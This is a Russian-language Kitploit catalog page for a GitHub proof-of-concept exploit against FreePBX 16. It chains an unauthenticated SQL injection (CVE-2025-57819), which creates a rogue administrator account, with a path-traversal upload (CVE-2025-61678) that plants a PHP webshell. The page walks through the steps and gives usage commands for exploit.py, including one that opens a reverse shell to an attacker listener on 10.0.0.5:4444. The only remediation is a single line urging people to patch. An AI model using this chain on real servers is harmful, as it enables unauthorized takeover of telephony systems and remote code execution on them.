Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-57819-RCE — CVE-2025-57819-RCE_PoC | Kitploit
Инструменты/GitHubGitHub/teteren/cve-2025-57819-rce
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingPayload Development
GitHubteteren/cve-2025-57819-rce

CVE-2025-57819-RCE

CVE-2025-57819-RCE_PoC

Репозиторий
19 дней назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

FreePBX 16 — неаутентифицированная SQL-инъекция до RCE

Краткое описание: В этом руководстве показано, как объединить две уязвимости FreePBX 16 (CVE-2025-57819 и CVE-2025-61678), чтобы построить полную цепочку атак — от неаутентифицированного доступа до удалённого выполнения кода (Remote Code Execution, RCE).

Информация об уязвимостях CVE

Номер CVEПоражённый компонентВоздействие и тип уязвимости
CVE-2025-57819Загрузчик модулей Endpoint (параметр brand)Неаутентифицированная многооператорная SQL-инъекция (Unauthenticated Stacked SQL Injection)
CVE-2025-61678Обработчик загрузки прошивки Endpoint Manager (параметр fwbrand)Аутентифицированная произвольная загрузка файлов / обход пути (Path Traversal)

Принцип атаки и последовательность действий

Создание учётной записи администратора (CVE-2025-57819)

Через загрузчик модулей пространства имён (Namespaced Endpoint Loader) запускается неаутентифицированная многооператорная SQL-инъекция, которая напрямую записывает в таблицу ampusers новую учётную запись администратора с полными правами.

Аутентификация (Authentication)

С помощью только что созданных учётных данных администратора выполняется вход в панель управления FreePBX.

Запись WebShell (CVE-2025-61678)

Злоупотребляя функцией загрузки прошивки в Endpoint Manager и используя уязвимость обхода пути в параметре fwbrand (../../../var/www/html/<dir>), PHP WebShell записывается непосредственно в корневой каталог веб-сайта.

Выполнение команд (Execution)

Вызов развёрнутого WebShell позволяет выполнить отдельную системную команду или установить интерактивный Reverse Shell.

Затронутые версии и рекомендации по исправлению

Затронутые версии: FreePBX 16 (модуль Endpoint версии ниже 16.0.92); FreePBX 17 (затронуты версии до 17.0.6).

Рекомендации по исправлению: как можно скорее установите последнюю исправленную версию.

Использование (Usage)

root@kitploit:~
# Выполнить одну команду
python3 exploit.py --rhost pbx.example.com --command "id"

# Установить интерактивный Reverse Shell (автоматическое прослушивание через pwntools)
python3 exploit.py --rhost pbx.example.com --lhost 10.0.0.5 --lport 4444

# Использовать обычный HTTP и произвольный порт
python3 exploit.py --rhost pbx.example.com --http --rport 80 --command "uname -a"

Описание параметров (Options)

ПараметрОписание
--rhost[обязательно] Адрес целевого хоста (Target Host)
--rportЦелевой порт (по умолчанию 443)
--httpПринудительно использовать HTTP вместо HTTPS по умолчанию
Скачать инструмент